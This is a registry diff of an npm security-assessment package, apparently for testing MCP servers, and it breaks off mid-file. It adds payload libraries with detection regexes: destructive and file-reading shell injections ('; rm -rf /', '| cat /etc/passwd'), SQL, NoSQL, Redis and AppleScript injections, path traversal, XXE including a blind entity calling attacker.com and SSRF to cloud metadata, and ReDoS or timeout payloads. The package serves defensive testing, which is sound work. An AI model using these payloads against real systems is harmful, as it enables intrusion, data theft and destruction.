@bryan-thompson/inspector-assessment 1.37.0 → 1.38.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/cli/build/lib/assessment-runner/assessment-executor.js +29 -1
- package/cli/build/lib/assessment-runner/source-loader.js +11 -0
- package/cli/package.json +1 -1
- package/client/dist/assets/{OAuthCallback-6-wM7Zc1.js → OAuthCallback-AngeBaCl.js} +1 -1
- package/client/dist/assets/{OAuthDebugCallback-Bw9-AzzP.js → OAuthDebugCallback--FE6_fPs.js} +1 -1
- package/client/dist/assets/{index-DyCdQP10.js → index-BQC95Boo.js} +4 -4
- package/client/dist/index.html +1 -1
- package/client/lib/lib/assessment/coreTypes.d.ts +37 -0
- package/client/lib/lib/assessment/coreTypes.d.ts.map +1 -1
- package/client/lib/lib/assessment/resultTypes.d.ts +26 -1
- package/client/lib/lib/assessment/resultTypes.d.ts.map +1 -1
- package/client/lib/lib/securityPatterns/advancedExploitPatterns.d.ts +13 -0
- package/client/lib/lib/securityPatterns/advancedExploitPatterns.d.ts.map +1 -0
- package/client/lib/lib/securityPatterns/advancedExploitPatterns.js +504 -0
- package/client/lib/lib/securityPatterns/authSessionPatterns.d.ts +12 -0
- package/client/lib/lib/securityPatterns/authSessionPatterns.d.ts.map +1 -0
- package/client/lib/lib/securityPatterns/authSessionPatterns.js +357 -0
- package/client/lib/lib/securityPatterns/index.d.ts +18 -0
- package/client/lib/lib/securityPatterns/index.d.ts.map +1 -0
- package/client/lib/lib/securityPatterns/index.js +18 -0
- package/client/lib/lib/securityPatterns/injectionPatterns.d.ts +13 -0
- package/client/lib/lib/securityPatterns/injectionPatterns.d.ts.map +1 -0
- package/client/lib/lib/securityPatterns/injectionPatterns.js +356 -0
- package/client/lib/lib/securityPatterns/resourceExhaustionPatterns.d.ts +12 -0
- package/client/lib/lib/securityPatterns/resourceExhaustionPatterns.d.ts.map +1 -0
- package/client/lib/lib/securityPatterns/resourceExhaustionPatterns.js +215 -0
- package/client/lib/lib/securityPatterns/toolSpecificPatterns.d.ts +13 -0
- package/client/lib/lib/securityPatterns/toolSpecificPatterns.d.ts.map +1 -0
- package/client/lib/lib/securityPatterns/toolSpecificPatterns.js +373 -0
- package/client/lib/lib/securityPatterns/types.d.ts +20 -0
- package/client/lib/lib/securityPatterns/types.d.ts.map +1 -0
- package/client/lib/lib/securityPatterns/types.js +6 -0
- package/client/lib/lib/securityPatterns/utils.d.ts +56 -0
- package/client/lib/lib/securityPatterns/utils.d.ts.map +1 -0
- package/client/lib/lib/securityPatterns/utils.js +96 -0
- package/client/lib/lib/securityPatterns/validationPatterns.d.ts +13 -0
- package/client/lib/lib/securityPatterns/validationPatterns.d.ts.map +1 -0
- package/client/lib/lib/securityPatterns/validationPatterns.js +110 -0
- package/client/lib/lib/securityPatterns.d.ts +18 -69
- package/client/lib/lib/securityPatterns.d.ts.map +1 -1
- package/client/lib/lib/securityPatterns.js +18 -1946
- package/client/lib/services/assessment/AssessmentOrchestrator.d.ts +4 -1
- package/client/lib/services/assessment/AssessmentOrchestrator.d.ts.map +1 -1
- package/client/lib/services/assessment/helpers/ExternalAPIDependencyDetector.d.ts +96 -5
- package/client/lib/services/assessment/helpers/ExternalAPIDependencyDetector.d.ts.map +1 -1
- package/client/lib/services/assessment/helpers/ExternalAPIDependencyDetector.js +202 -16
- package/client/lib/services/assessment/helpers/StdioTransportDetector.d.ts +137 -0
- package/client/lib/services/assessment/helpers/StdioTransportDetector.d.ts.map +1 -0
- package/client/lib/services/assessment/helpers/StdioTransportDetector.js +315 -0
- package/client/lib/services/assessment/helpers/ToolAnnotationExtractor.d.ts +34 -0
- package/client/lib/services/assessment/helpers/ToolAnnotationExtractor.d.ts.map +1 -0
- package/client/lib/services/assessment/helpers/ToolAnnotationExtractor.js +85 -0
- package/client/lib/services/assessment/modules/ErrorHandlingAssessor.d.ts +17 -0
- package/client/lib/services/assessment/modules/ErrorHandlingAssessor.d.ts.map +1 -1
- package/client/lib/services/assessment/modules/ErrorHandlingAssessor.js +162 -10
- package/client/lib/services/assessment/modules/ProtocolComplianceAssessor.d.ts.map +1 -1
- package/client/lib/services/assessment/modules/ProtocolComplianceAssessor.js +30 -0
- package/client/lib/services/assessment/modules/SecurityAssessor.d.ts.map +1 -1
- package/client/lib/services/assessment/modules/SecurityAssessor.js +6 -0
- package/client/lib/services/assessment/modules/securityTests/AnnotationAwareSeverity.d.ts +55 -0
- package/client/lib/services/assessment/modules/securityTests/AnnotationAwareSeverity.d.ts.map +1 -0
- package/client/lib/services/assessment/modules/securityTests/AnnotationAwareSeverity.js +135 -0
- package/client/lib/services/assessment/modules/securityTests/SafeResponseDetector.d.ts +6 -0
- package/client/lib/services/assessment/modules/securityTests/SafeResponseDetector.d.ts.map +1 -1
- package/client/lib/services/assessment/modules/securityTests/SafeResponseDetector.js +9 -1
- package/client/lib/services/assessment/modules/securityTests/SecurityPatternLibrary.d.ts +20 -0
- package/client/lib/services/assessment/modules/securityTests/SecurityPatternLibrary.d.ts.map +1 -1
- package/client/lib/services/assessment/modules/securityTests/SecurityPatternLibrary.js +37 -0
- package/client/lib/services/assessment/modules/securityTests/SecurityPayloadTester.d.ts +11 -1
- package/client/lib/services/assessment/modules/securityTests/SecurityPayloadTester.d.ts.map +1 -1
- package/client/lib/services/assessment/modules/securityTests/SecurityPayloadTester.js +26 -1
- package/client/lib/services/assessment/modules/securityTests/SecurityResponseAnalyzer.d.ts +1 -1
- package/client/lib/services/assessment/modules/securityTests/SecurityResponseAnalyzer.d.ts.map +1 -1
- package/client/lib/services/assessment/modules/securityTests/SecurityResponseAnalyzer.js +10 -1
- package/client/lib/services/assessment/modules/securityTests/index.d.ts +1 -0
- package/client/lib/services/assessment/modules/securityTests/index.d.ts.map +1 -1
- package/client/lib/services/assessment/modules/securityTests/index.js +1 -0
- package/client/package.json +1 -1
- package/package.json +1 -1
- package/server/package.json +1 -1
|
@@ -0,0 +1,356 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Injection Attack Patterns
|
|
3
|
+
*
|
|
4
|
+
* Critical injection vulnerabilities - highest severity attacks.
|
|
5
|
+
* Includes: Command Injection, AppleScript Command Injection, SQL Injection,
|
|
6
|
+
* Calculator Injection, Path Traversal, XXE Injection, NoSQL Injection
|
|
7
|
+
*/
|
|
8
|
+
/**
|
|
9
|
+
* Critical injection attack patterns (7 patterns)
|
|
10
|
+
*/
|
|
11
|
+
export const INJECTION_PATTERNS = [
|
|
12
|
+
// 1. COMMAND INJECTION
|
|
13
|
+
{
|
|
14
|
+
attackName: "Command Injection",
|
|
15
|
+
description: "Test if tool executes system commands instead of treating them as safe parameters",
|
|
16
|
+
payloads: [
|
|
17
|
+
// System command payloads - might trigger command execution tools
|
|
18
|
+
{
|
|
19
|
+
payload: "whoami",
|
|
20
|
+
evidence: /\b(root|user|admin)\b/i,
|
|
21
|
+
riskLevel: "HIGH",
|
|
22
|
+
description: "System identity command",
|
|
23
|
+
payloadType: "injection",
|
|
24
|
+
},
|
|
25
|
+
{
|
|
26
|
+
payload: "ls -la",
|
|
27
|
+
// Issue #27: Tighten pattern to require ls -la specific context
|
|
28
|
+
// Avoids false positives from "X total in memory" tool status messages
|
|
29
|
+
evidence: /(total\s+\d+\s*$|^[d-][rwx-]{9}\s+\d+|drwxr|permissions\s+denied)/im,
|
|
30
|
+
riskLevel: "HIGH",
|
|
31
|
+
description: "Directory listing command",
|
|
32
|
+
payloadType: "injection",
|
|
33
|
+
},
|
|
34
|
+
{
|
|
35
|
+
payload: "pwd",
|
|
36
|
+
evidence: /\/[a-z]+/i,
|
|
37
|
+
riskLevel: "HIGH",
|
|
38
|
+
description: "Working directory command",
|
|
39
|
+
payloadType: "injection",
|
|
40
|
+
},
|
|
41
|
+
{
|
|
42
|
+
payload: "; rm -rf /",
|
|
43
|
+
evidence: /(deleted|removed|rm.*rf)/i,
|
|
44
|
+
riskLevel: "HIGH",
|
|
45
|
+
description: "Command chaining with destructive command",
|
|
46
|
+
payloadType: "injection",
|
|
47
|
+
},
|
|
48
|
+
{
|
|
49
|
+
payload: "| cat /etc/passwd",
|
|
50
|
+
evidence: /(root:x:|file.*protocol.*executed|local.*file.*ran)/i,
|
|
51
|
+
riskLevel: "HIGH",
|
|
52
|
+
description: "Pipe to file access command",
|
|
53
|
+
payloadType: "injection",
|
|
54
|
+
},
|
|
55
|
+
],
|
|
56
|
+
},
|
|
57
|
+
// 2. APPLESCRIPT COMMAND INJECTION (Issue #174)
|
|
58
|
+
{
|
|
59
|
+
attackName: "AppleScript Command Injection",
|
|
60
|
+
description: "Test if tool executes arbitrary AppleScript/osascript commands via string interpolation",
|
|
61
|
+
payloads: [
|
|
62
|
+
// Double quote escape to shell execution
|
|
63
|
+
{
|
|
64
|
+
payload: '" & do shell script "id" & "',
|
|
65
|
+
evidence: /uid=\d+|gid=\d+|\broot\b(?=:|\s|$)|whoami\s*$/i,
|
|
66
|
+
riskLevel: "HIGH",
|
|
67
|
+
description: "AppleScript string escape to shell (double quotes)",
|
|
68
|
+
payloadType: "injection",
|
|
69
|
+
},
|
|
70
|
+
// Single quote escape variant
|
|
71
|
+
{
|
|
72
|
+
payload: "' & do shell script 'whoami' & '",
|
|
73
|
+
evidence: /uid=\d+|gid=\d+|\broot\b(?=:|\s|$)|whoami\s*$/i,
|
|
74
|
+
riskLevel: "HIGH",
|
|
75
|
+
description: "AppleScript string escape to shell (single quotes)",
|
|
76
|
+
payloadType: "injection",
|
|
77
|
+
},
|
|
78
|
+
// System info extraction
|
|
79
|
+
{
|
|
80
|
+
payload: "osascript -e 'return (system info)'",
|
|
81
|
+
evidence: /processor|memory|system.*version/i,
|
|
82
|
+
riskLevel: "MEDIUM",
|
|
83
|
+
description: "AppleScript system info extraction",
|
|
84
|
+
payloadType: "injection",
|
|
85
|
+
},
|
|
86
|
+
// File read via shell escape
|
|
87
|
+
{
|
|
88
|
+
payload: '" & do shell script "cat /etc/passwd" & "',
|
|
89
|
+
evidence: /root:.*:0:0|\/bin\/(ba)?sh/i,
|
|
90
|
+
riskLevel: "HIGH",
|
|
91
|
+
description: "AppleScript file read via shell escape",
|
|
92
|
+
payloadType: "injection",
|
|
93
|
+
},
|
|
94
|
+
],
|
|
95
|
+
},
|
|
96
|
+
// 3. SQL INJECTION
|
|
97
|
+
{
|
|
98
|
+
attackName: "SQL Injection",
|
|
99
|
+
description: "Test if tool properly escapes SQL commands",
|
|
100
|
+
payloads: [
|
|
101
|
+
{
|
|
102
|
+
payload: "'; DROP TABLE users;--",
|
|
103
|
+
evidence: /(dropped|deleted|table.*users|sql.*error|syntax.*error)/i,
|
|
104
|
+
riskLevel: "HIGH",
|
|
105
|
+
description: "SQL command injection",
|
|
106
|
+
payloadType: "injection",
|
|
107
|
+
},
|
|
108
|
+
{
|
|
109
|
+
payload: "' OR '1'='1",
|
|
110
|
+
evidence: /(sql|query|select|where.*1.*1|syntax.*error)/i,
|
|
111
|
+
riskLevel: "HIGH",
|
|
112
|
+
description: "Boolean-based SQL injection",
|
|
113
|
+
payloadType: "injection",
|
|
114
|
+
},
|
|
115
|
+
{
|
|
116
|
+
payload: "admin'--",
|
|
117
|
+
evidence: /(sql.*executed|admin.*query|syntax.*error)/i,
|
|
118
|
+
riskLevel: "HIGH",
|
|
119
|
+
description: "Comment-based SQL injection",
|
|
120
|
+
payloadType: "injection",
|
|
121
|
+
},
|
|
122
|
+
{
|
|
123
|
+
payload: "' UNION SELECT * FROM passwords--",
|
|
124
|
+
evidence: /(union.*select|password|sql.*error|syntax.*error)/i,
|
|
125
|
+
riskLevel: "HIGH",
|
|
126
|
+
description: "UNION-based SQL injection",
|
|
127
|
+
payloadType: "injection",
|
|
128
|
+
},
|
|
129
|
+
],
|
|
130
|
+
},
|
|
131
|
+
// 4. CALCULATOR INJECTION
|
|
132
|
+
{
|
|
133
|
+
attackName: "Calculator Injection",
|
|
134
|
+
description: "Test if calculator/math tools execute arbitrary expressions instead of safely storing them",
|
|
135
|
+
payloads: [
|
|
136
|
+
// Simple arithmetic - triggers eval() in vulnerable calculator tools
|
|
137
|
+
{
|
|
138
|
+
payload: "2+2",
|
|
139
|
+
evidence: /The answer is 4/i,
|
|
140
|
+
riskLevel: "HIGH",
|
|
141
|
+
description: "Simple arithmetic expression (common trigger)",
|
|
142
|
+
payloadType: "injection",
|
|
143
|
+
},
|
|
144
|
+
{
|
|
145
|
+
payload: "5*5",
|
|
146
|
+
evidence: /The answer is 25/i,
|
|
147
|
+
riskLevel: "HIGH",
|
|
148
|
+
description: "Multiplication expression",
|
|
149
|
+
payloadType: "injection",
|
|
150
|
+
},
|
|
151
|
+
{
|
|
152
|
+
payload: "100+200",
|
|
153
|
+
evidence: /The answer is 300/i,
|
|
154
|
+
riskLevel: "HIGH",
|
|
155
|
+
description: "Addition with larger numbers",
|
|
156
|
+
payloadType: "injection",
|
|
157
|
+
},
|
|
158
|
+
// Natural language triggers
|
|
159
|
+
{
|
|
160
|
+
payload: "what is 10*10",
|
|
161
|
+
evidence: /The answer is 100/i,
|
|
162
|
+
riskLevel: "HIGH",
|
|
163
|
+
description: "Natural language math query",
|
|
164
|
+
payloadType: "injection",
|
|
165
|
+
},
|
|
166
|
+
{
|
|
167
|
+
payload: "calculate 50+50",
|
|
168
|
+
evidence: /The answer is 100/i,
|
|
169
|
+
riskLevel: "HIGH",
|
|
170
|
+
description: "Calculate command",
|
|
171
|
+
payloadType: "injection",
|
|
172
|
+
},
|
|
173
|
+
// Code injection via eval()
|
|
174
|
+
{
|
|
175
|
+
payload: "__import__('os').system('whoami')",
|
|
176
|
+
evidence: /\b(root|user|admin|ubuntu)\b/i,
|
|
177
|
+
riskLevel: "HIGH",
|
|
178
|
+
description: "Python code injection via eval",
|
|
179
|
+
payloadType: "injection",
|
|
180
|
+
},
|
|
181
|
+
{
|
|
182
|
+
payload: "1+1; __import__('subprocess').run(['whoami'])",
|
|
183
|
+
evidence: /\b(root|user|admin|ubuntu)\b/i,
|
|
184
|
+
riskLevel: "HIGH",
|
|
185
|
+
description: "eval chain to system command",
|
|
186
|
+
payloadType: "injection",
|
|
187
|
+
},
|
|
188
|
+
],
|
|
189
|
+
},
|
|
190
|
+
// 5. PATH TRAVERSAL
|
|
191
|
+
{
|
|
192
|
+
attackName: "Path Traversal",
|
|
193
|
+
description: "Test if tool allows access to files outside intended directory",
|
|
194
|
+
payloads: [
|
|
195
|
+
{
|
|
196
|
+
payload: "../../../etc/passwd",
|
|
197
|
+
evidence: /(root:x:0:0|file.*accessed|passwd.*file)/i,
|
|
198
|
+
riskLevel: "HIGH",
|
|
199
|
+
description: "Unix path traversal",
|
|
200
|
+
payloadType: "injection",
|
|
201
|
+
},
|
|
202
|
+
{
|
|
203
|
+
payload: "..\\..\\..\\windows\\system32\\config\\sam",
|
|
204
|
+
evidence: /(\[boot loader\]|sam.*file|system32)/i,
|
|
205
|
+
riskLevel: "HIGH",
|
|
206
|
+
description: "Windows path traversal",
|
|
207
|
+
payloadType: "injection",
|
|
208
|
+
},
|
|
209
|
+
{
|
|
210
|
+
payload: "/etc/passwd",
|
|
211
|
+
evidence: /(root:x:0:0|file.*accessed)/i,
|
|
212
|
+
riskLevel: "HIGH",
|
|
213
|
+
description: "Absolute path access",
|
|
214
|
+
payloadType: "injection",
|
|
215
|
+
},
|
|
216
|
+
{
|
|
217
|
+
payload: "file:///etc/passwd",
|
|
218
|
+
evidence: /(root:x:|file.*protocol.*executed|local.*file.*accessed)/i,
|
|
219
|
+
riskLevel: "HIGH",
|
|
220
|
+
description: "File protocol exploitation",
|
|
221
|
+
payloadType: "injection",
|
|
222
|
+
},
|
|
223
|
+
],
|
|
224
|
+
},
|
|
225
|
+
// 6. XXE INJECTION (XML External Entity)
|
|
226
|
+
{
|
|
227
|
+
attackName: "XXE Injection",
|
|
228
|
+
description: "Test if tool processes XML external entities, allowing file disclosure or SSRF",
|
|
229
|
+
payloads: [
|
|
230
|
+
// Classic XXE - file disclosure
|
|
231
|
+
{
|
|
232
|
+
payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
|
|
233
|
+
evidence: /(root:x:0:0|xxe.*processed|external.*entity.*loaded|file.*contents)/i,
|
|
234
|
+
riskLevel: "HIGH",
|
|
235
|
+
description: "XXE file disclosure via SYSTEM entity",
|
|
236
|
+
payloadType: "injection",
|
|
237
|
+
parameterTypes: ["xml", "data", "body", "payload", "content"],
|
|
238
|
+
},
|
|
239
|
+
// XXE with Windows path
|
|
240
|
+
{
|
|
241
|
+
payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><foo>&xxe;</foo>',
|
|
242
|
+
evidence: /(\[fonts\]|\[extensions\]|xxe.*processed|windows.*file.*accessed)/i,
|
|
243
|
+
riskLevel: "HIGH",
|
|
244
|
+
description: "XXE Windows file disclosure",
|
|
245
|
+
payloadType: "injection",
|
|
246
|
+
parameterTypes: ["xml", "data", "body", "payload"],
|
|
247
|
+
},
|
|
248
|
+
// XXE SSRF via HTTP entity
|
|
249
|
+
{
|
|
250
|
+
payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><foo>&xxe;</foo>',
|
|
251
|
+
evidence: /(ami-id|instance-id|xxe.*fetched|metadata.*accessed|ssrf.*xml)/i,
|
|
252
|
+
riskLevel: "HIGH",
|
|
253
|
+
description: "XXE SSRF to AWS metadata",
|
|
254
|
+
payloadType: "injection",
|
|
255
|
+
parameterTypes: ["xml", "data", "body", "payload"],
|
|
256
|
+
},
|
|
257
|
+
// Parameter entity XXE (blind XXE)
|
|
258
|
+
{
|
|
259
|
+
payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]><foo>test</foo>',
|
|
260
|
+
evidence: /(dtd.*loaded|parameter.*entity|external.*dtd|xxe.*processed)/i,
|
|
261
|
+
riskLevel: "HIGH",
|
|
262
|
+
description: "Blind XXE via parameter entity",
|
|
263
|
+
payloadType: "injection",
|
|
264
|
+
parameterTypes: ["xml", "data", "body", "payload"],
|
|
265
|
+
},
|
|
266
|
+
// XXE in SOAP request
|
|
267
|
+
{
|
|
268
|
+
payload: '<?xml version="1.0"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><soap:Body><foo>&xxe;</foo></soap:Body></soap:Envelope>',
|
|
269
|
+
evidence: /(root:x:0:0|soap.*xxe|xxe.*soap|external.*entity)/i,
|
|
270
|
+
riskLevel: "HIGH",
|
|
271
|
+
description: "XXE in SOAP envelope",
|
|
272
|
+
payloadType: "injection",
|
|
273
|
+
parameterTypes: ["xml", "soap", "body", "request"],
|
|
274
|
+
},
|
|
275
|
+
],
|
|
276
|
+
},
|
|
277
|
+
// 7. NOSQL INJECTION
|
|
278
|
+
{
|
|
279
|
+
attackName: "NoSQL Injection",
|
|
280
|
+
description: "Test if tool is vulnerable to NoSQL injection attacks (MongoDB, Redis, etc.)",
|
|
281
|
+
payloads: [
|
|
282
|
+
// MongoDB operator injection
|
|
283
|
+
{
|
|
284
|
+
payload: '{"$gt": ""}',
|
|
285
|
+
evidence: /(all.*documents|query.*executed|mongodb.*error|operator.*injection|nosql.*executed)/i,
|
|
286
|
+
riskLevel: "HIGH",
|
|
287
|
+
description: "MongoDB $gt operator injection",
|
|
288
|
+
payloadType: "injection",
|
|
289
|
+
parameterTypes: ["query", "filter", "where", "search", "data"],
|
|
290
|
+
},
|
|
291
|
+
// MongoDB $ne always-true
|
|
292
|
+
{
|
|
293
|
+
payload: '{"$ne": null}',
|
|
294
|
+
evidence: /(returned.*all|bypass.*auth|nosql.*injection|query.*result|documents.*found)/i,
|
|
295
|
+
riskLevel: "HIGH",
|
|
296
|
+
description: "MongoDB $ne bypass injection",
|
|
297
|
+
payloadType: "injection",
|
|
298
|
+
parameterTypes: ["query", "filter", "where", "password", "username"],
|
|
299
|
+
},
|
|
300
|
+
// MongoDB $where JavaScript injection
|
|
301
|
+
{
|
|
302
|
+
payload: '{"$where": "this.password.match(/.*/)"}',
|
|
303
|
+
evidence: /(javascript.*executed|\$where.*processed|nosql.*js|all.*passwords|query.*executed)/i,
|
|
304
|
+
riskLevel: "HIGH",
|
|
305
|
+
description: "MongoDB $where JavaScript injection",
|
|
306
|
+
payloadType: "injection",
|
|
307
|
+
parameterTypes: ["query", "filter", "where", "data"],
|
|
308
|
+
},
|
|
309
|
+
// MongoDB $regex DOS
|
|
310
|
+
{
|
|
311
|
+
payload: '{"$regex": "^(a+)+$"}',
|
|
312
|
+
evidence: /(regex.*executed|redos|timeout|catastrophic.*backtracking|query.*slow)/i,
|
|
313
|
+
riskLevel: "MEDIUM",
|
|
314
|
+
description: "MongoDB ReDoS via $regex",
|
|
315
|
+
payloadType: "injection",
|
|
316
|
+
parameterTypes: ["query", "filter", "search", "pattern"],
|
|
317
|
+
},
|
|
318
|
+
// MongoDB union-style query
|
|
319
|
+
{
|
|
320
|
+
payload: "admin', $or: [ {}, { 'a': 'a",
|
|
321
|
+
evidence: /(admin.*returned|auth.*bypass|or.*injection|nosql.*executed)/i,
|
|
322
|
+
riskLevel: "HIGH",
|
|
323
|
+
description: "MongoDB $or injection bypass",
|
|
324
|
+
payloadType: "injection",
|
|
325
|
+
parameterTypes: ["username", "user", "name", "query"],
|
|
326
|
+
},
|
|
327
|
+
// Redis command injection
|
|
328
|
+
{
|
|
329
|
+
payload: "test\r\nCONFIG GET *\r\n",
|
|
330
|
+
evidence: /(redis.*config|requirepass|maxmemory|save.*seconds|redis.*command.*executed)/i,
|
|
331
|
+
riskLevel: "HIGH",
|
|
332
|
+
description: "Redis CRLF command injection",
|
|
333
|
+
payloadType: "injection",
|
|
334
|
+
parameterTypes: ["key", "value", "data", "input"],
|
|
335
|
+
},
|
|
336
|
+
// Redis Lua script injection
|
|
337
|
+
{
|
|
338
|
+
payload: "EVAL \"return redis.call('INFO')\" 0",
|
|
339
|
+
evidence: /(redis_version|used_memory|connected_clients|lua.*executed)/i,
|
|
340
|
+
riskLevel: "HIGH",
|
|
341
|
+
description: "Redis Lua script injection",
|
|
342
|
+
payloadType: "injection",
|
|
343
|
+
parameterTypes: ["script", "command", "query", "data"],
|
|
344
|
+
},
|
|
345
|
+
// CouchDB injection
|
|
346
|
+
{
|
|
347
|
+
payload: '{"selector": {"$or": [{"_id": {"$gt": null}}]}}',
|
|
348
|
+
evidence: /(all.*documents|couchdb.*query|selector.*executed|documents.*returned)/i,
|
|
349
|
+
riskLevel: "HIGH",
|
|
350
|
+
description: "CouchDB selector injection",
|
|
351
|
+
payloadType: "injection",
|
|
352
|
+
parameterTypes: ["query", "selector", "filter", "find"],
|
|
353
|
+
},
|
|
354
|
+
],
|
|
355
|
+
},
|
|
356
|
+
];
|
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Resource Exhaustion and Deserialization Patterns
|
|
3
|
+
*
|
|
4
|
+
* Tests for DoS, resource exhaustion, and deserialization vulnerabilities.
|
|
5
|
+
* Includes: DoS/Resource Exhaustion, Insecure Deserialization
|
|
6
|
+
*/
|
|
7
|
+
import { AttackPattern } from "./types.js";
|
|
8
|
+
/**
|
|
9
|
+
* Resource exhaustion and deserialization patterns (2 patterns)
|
|
10
|
+
*/
|
|
11
|
+
export declare const RESOURCE_EXHAUSTION_PATTERNS: AttackPattern[];
|
|
12
|
+
//# sourceMappingURL=resourceExhaustionPatterns.d.ts.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"resourceExhaustionPatterns.d.ts","sourceRoot":"","sources":["../../../src/lib/securityPatterns/resourceExhaustionPatterns.ts"],"names":[],"mappings":"AAAA;;;;;GAKG;AAEH,OAAO,EAAE,aAAa,EAAE,MAAM,SAAS,CAAC;AAExC;;GAEG;AACH,eAAO,MAAM,4BAA4B,EAAE,aAAa,EAsOvD,CAAC"}
|
|
@@ -0,0 +1,215 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Resource Exhaustion and Deserialization Patterns
|
|
3
|
+
*
|
|
4
|
+
* Tests for DoS, resource exhaustion, and deserialization vulnerabilities.
|
|
5
|
+
* Includes: DoS/Resource Exhaustion, Insecure Deserialization
|
|
6
|
+
*/
|
|
7
|
+
/**
|
|
8
|
+
* Resource exhaustion and deserialization patterns (2 patterns)
|
|
9
|
+
*/
|
|
10
|
+
export const RESOURCE_EXHAUSTION_PATTERNS = [
|
|
11
|
+
// 19. DOS/RESOURCE EXHAUSTION
|
|
12
|
+
{
|
|
13
|
+
attackName: "DoS/Resource Exhaustion",
|
|
14
|
+
description: "Test if tool is vulnerable to denial of service through resource exhaustion (ReDoS, memory allocation, timeout abuse)",
|
|
15
|
+
payloads: [
|
|
16
|
+
// ReDoS Payloads (Catastrophic Backtracking)
|
|
17
|
+
{
|
|
18
|
+
payload: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!",
|
|
19
|
+
evidence: /timeout|timed.?out|catastrophic|backtrack|hung|unresponsive|resource.?limit|regex.?timeout/i,
|
|
20
|
+
riskLevel: "HIGH",
|
|
21
|
+
description: "ReDoS via evil regex input (catastrophic backtracking)",
|
|
22
|
+
payloadType: "dos",
|
|
23
|
+
parameterTypes: [
|
|
24
|
+
"pattern",
|
|
25
|
+
"regex",
|
|
26
|
+
"search",
|
|
27
|
+
"query",
|
|
28
|
+
"filter",
|
|
29
|
+
"text",
|
|
30
|
+
"input",
|
|
31
|
+
],
|
|
32
|
+
},
|
|
33
|
+
{
|
|
34
|
+
payload: "(a+)+b",
|
|
35
|
+
evidence: /timeout|timed.?out|catastrophic|backtrack|regex.?error|pattern.?error|stack.?overflow/i,
|
|
36
|
+
riskLevel: "HIGH",
|
|
37
|
+
description: "ReDoS via nested quantifier pattern",
|
|
38
|
+
payloadType: "dos",
|
|
39
|
+
parameterTypes: ["pattern", "regex", "search", "query", "filter"],
|
|
40
|
+
},
|
|
41
|
+
{
|
|
42
|
+
payload: "a]a]a]a]a]a]a]a]a]a]a]a]a]a]a]a]",
|
|
43
|
+
evidence: /timeout|backtrack|regex.?overflow|stack.?overflow|parse.?error/i,
|
|
44
|
+
riskLevel: "HIGH",
|
|
45
|
+
description: "ReDoS via character class abuse",
|
|
46
|
+
payloadType: "dos",
|
|
47
|
+
parameterTypes: ["pattern", "regex", "search", "query"],
|
|
48
|
+
},
|
|
49
|
+
{
|
|
50
|
+
payload: "^(([a-z])+.)+[A-Z]([a-z])+$",
|
|
51
|
+
evidence: /timeout|catastrophic|backtrack|polynomial|exponential|regex.?complexity/i,
|
|
52
|
+
riskLevel: "HIGH",
|
|
53
|
+
description: "ReDoS via polynomial complexity pattern",
|
|
54
|
+
payloadType: "dos",
|
|
55
|
+
parameterTypes: ["pattern", "regex", "search", "query", "filter"],
|
|
56
|
+
},
|
|
57
|
+
// Memory Allocation Payloads
|
|
58
|
+
{
|
|
59
|
+
payload: "999999999999",
|
|
60
|
+
evidence: /memory.?error|allocation.?failed|out.?of.?memory|heap|buffer.?overflow|resource.?limit|integer.?overflow/i,
|
|
61
|
+
riskLevel: "HIGH",
|
|
62
|
+
description: "Memory exhaustion via large number input",
|
|
63
|
+
payloadType: "dos",
|
|
64
|
+
parameterTypes: [
|
|
65
|
+
"size",
|
|
66
|
+
"count",
|
|
67
|
+
"length",
|
|
68
|
+
"limit",
|
|
69
|
+
"amount",
|
|
70
|
+
"quantity",
|
|
71
|
+
"number",
|
|
72
|
+
],
|
|
73
|
+
},
|
|
74
|
+
{
|
|
75
|
+
// Pre-evaluated 10KB string
|
|
76
|
+
payload: "x".repeat(10000),
|
|
77
|
+
evidence: /too.?long|exceeds.?length|maximum.?length|length.?limit|resource.?limit|payload.?too.?large|memory/i,
|
|
78
|
+
riskLevel: "MEDIUM",
|
|
79
|
+
description: "Memory exhaustion via large string payload (10KB)",
|
|
80
|
+
payloadType: "dos",
|
|
81
|
+
},
|
|
82
|
+
{
|
|
83
|
+
// 10-level deep nested JSON
|
|
84
|
+
payload: '{"a":{"a":{"a":{"a":{"a":{"a":{"a":{"a":{"a":{"a":{}}}}}}}}}}}',
|
|
85
|
+
evidence: /stack.?overflow|recursion|depth.?limit|nesting.?limit|too.?deep|parse.?error|json.?depth/i,
|
|
86
|
+
riskLevel: "HIGH",
|
|
87
|
+
description: "Stack exhaustion via deep JSON nesting",
|
|
88
|
+
payloadType: "dos",
|
|
89
|
+
parameterTypes: ["data", "json", "body", "payload", "input"],
|
|
90
|
+
},
|
|
91
|
+
// Timeout Abuse Payloads
|
|
92
|
+
{
|
|
93
|
+
payload: "sleep(99999)",
|
|
94
|
+
evidence: /timeout|timed.?out|operation.?cancelled|deadline|long.?running|sleep.?executed/i,
|
|
95
|
+
riskLevel: "HIGH",
|
|
96
|
+
description: "Timeout abuse via sleep command injection",
|
|
97
|
+
payloadType: "dos",
|
|
98
|
+
parameterTypes: ["command", "script", "code", "expression", "input"],
|
|
99
|
+
},
|
|
100
|
+
{
|
|
101
|
+
payload: "WAITFOR DELAY '00:10:00'",
|
|
102
|
+
evidence: /timeout|timed.?out|sql.?timeout|query.?timeout|waitfor.?executed/i,
|
|
103
|
+
riskLevel: "HIGH",
|
|
104
|
+
description: "Timeout abuse via SQL WAITFOR",
|
|
105
|
+
payloadType: "dos",
|
|
106
|
+
parameterTypes: ["query", "sql", "command"],
|
|
107
|
+
},
|
|
108
|
+
{
|
|
109
|
+
